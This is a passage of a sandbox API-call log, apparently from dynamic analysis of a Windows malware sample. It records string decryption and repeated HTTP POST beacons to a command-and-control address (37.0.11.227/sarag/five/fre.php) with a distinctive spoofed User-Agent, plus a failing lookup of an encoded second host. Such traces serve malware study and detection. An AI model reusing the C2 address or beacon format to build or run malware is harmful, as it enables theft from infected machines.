(lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.215] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.215] GetProcessHeap () returned 0x690000 [0299.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.216] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0299.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0299.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.218] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0299.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.219] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0299.219] GetProcessHeap () returned 0x690000 [0299.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.219] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0299.219] GetProcessHeap () returned 0x690000 [0299.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0299.219] socket (af=2, type=1, protocol=6) returned 0x9d4 [0299.220] connect (s=0x9d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.244] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.244] GetProcessHeap () returned 0x690000 [0299.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0299.244] GetProcessHeap () returned 0x690000 [0299.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.245] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.246] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.246] GetProcessHeap () returned 0x690000 [0299.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0299.246] GetProcessHeap () returned 0x690000 [0299.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.246] GetProcessHeap () returned 0x690000 [0299.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0299.246] GetProcessHeap () returned 0x690000 [0299.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.247] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.248] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.248] GetProcessHeap () returned 0x690000 [0299.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.248] GetProcessHeap () returned 0x690000 [0299.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.249] send (s=0x9d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.249] send (s=0x9d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.249] GetProcessHeap () returned 0x690000 [0299.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.249] recv (in: s=0x9d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0299.328] GetProcessHeap () returned 0x690000 [0299.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0299.329] GetProcessHeap () returned 0x690000 [0299.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0299.330] GetProcessHeap () returned 0x690000 [0299.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0299.330] GetProcessHeap () returned 0x690000 [0299.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0299.330] closesocket (s=0x9d4) returned 0 [0299.331] GetProcessHeap () returned 0x690000 [0299.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0299.331] GetProcessHeap () returned 0x690000 [0299.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.331] GetProcessHeap () returned 0x690000 [0299.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0299.332] GetProcessHeap () returned 0x690000 [0299.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa48) returned 0x9d4 [0299.337] Sleep (dwMilliseconds=0xea60) [0299.343] GetProcessHeap () returned 0x690000 [0299.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.355] GetProcessHeap () returned 0x690000 [0299.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0299.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.356] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.357] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.363] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.363] GetProcessHeap () returned 0x690000 [0299.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0299.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.364] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.365] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.366] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.366] GetProcessHeap () returned 0x690000 [0299.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.367] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.368] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.369] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.370] GetProcessHeap () returned 0x690000 [0299.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.370] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.370] GetProcessHeap () returned 0x690000 [0299.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.371] GetProcessHeap () returned 0x690000 [0299.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.371] GetProcessHeap () returned 0x690000 [0299.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.374] GetProcessHeap () returned 0x690000 [0299.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.375] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.386] GetProcessHeap () returned 0x690000 [0299.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0299.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.387] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.388] GetProcessHeap () returned 0x690000 [0299.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0299.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.390] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.391] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.392] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0299.392] GetProcessHeap () returned 0x690000 [0299.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.393] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0299.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0299.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0299.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.395] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0299.395] GetProcessHeap () returned 0x690000 [0299.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0299.395] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0299.395] GetProcessHeap () returned 0x690000 [0299.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0299.395] socket (af=2, type=1, protocol=6) returned 0x9d8 [0299.396] connect (s=0x9d8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.427] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.427] GetProcessHeap () returned 0x690000 [0299.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0299.427] GetProcessHeap () returned 0x690000 [0299.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.427] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.428] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.428] GetProcessHeap () returned 0x690000 [0299.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0299.428] GetProcessHeap () returned 0x690000 [0299.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.429] GetProcessHeap () returned 0x690000 [0299.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0299.429] GetProcessHeap () returned 0x690000 [0299.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.430] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.430] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.430] GetProcessHeap () returned 0x690000 [0299.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.431] GetProcessHeap () returned 0x690000 [0299.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.431] send (s=0x9d8, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.431] send (s=0x9d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.431] GetProcessHeap () returned 0x690000 [0299.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.432] recv (in: s=0x9d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0299.509] GetProcessHeap () returned 0x690000 [0299.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0299.509] GetProcessHeap () returned 0x690000 [0299.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0299.510] GetProcessHeap () returned 0x690000 [0299.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0299.510] GetProcessHeap () returned 0x690000 [0299.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0299.511] closesocket (s=0x9d8) returned 0 [0299.511] GetProcessHeap () returned 0x690000 [0299.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0299.511] GetProcessHeap () returned 0x690000 [0299.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.512] GetProcessHeap () returned 0x690000 [0299.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.512] GetProcessHeap () returned 0x690000 [0299.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa28) returned 0x9d8 [0299.515] Sleep (dwMilliseconds=0xea60) [0299.516] GetProcessHeap () returned 0x690000 [0299.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.525] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0299.534] GetProcessHeap () returned 0x690000 [0299.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0299.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.535] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0299.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.536] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.539] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.539] GetProcessHeap () returned 0x690000 [0299.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0299.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.541] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.542] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0299.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.542] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0299.542] GetProcessHeap () returned 0x690000 [0299.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0299.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.545] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.546] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.546] GetProcessHeap () returned 0x690000 [0299.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0299.552] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.552] GetProcessHeap () returned 0x690000 [0299.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0299.553] GetProcessHeap () returned 0x690000 [0299.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0299.553] GetProcessHeap () returned 0x690000 [0299.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.553] GetProcessHeap () returned 0x690000 [0299.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0299.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0299.565] GetProcessHeap () returned 0x690000 [0299.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0299.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.566] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.567] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.568] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.568] GetProcessHeap () returned 0x690000 [0299.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0299.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.569] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0299.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.571] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.572] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0299.572] GetProcessHeap () returned 0x690000 [0299.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.573] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0299.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.574] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0299.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.575] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0299.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.576] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0299.576] GetProcessHeap () returned 0x690000 [0299.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0299.576] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, 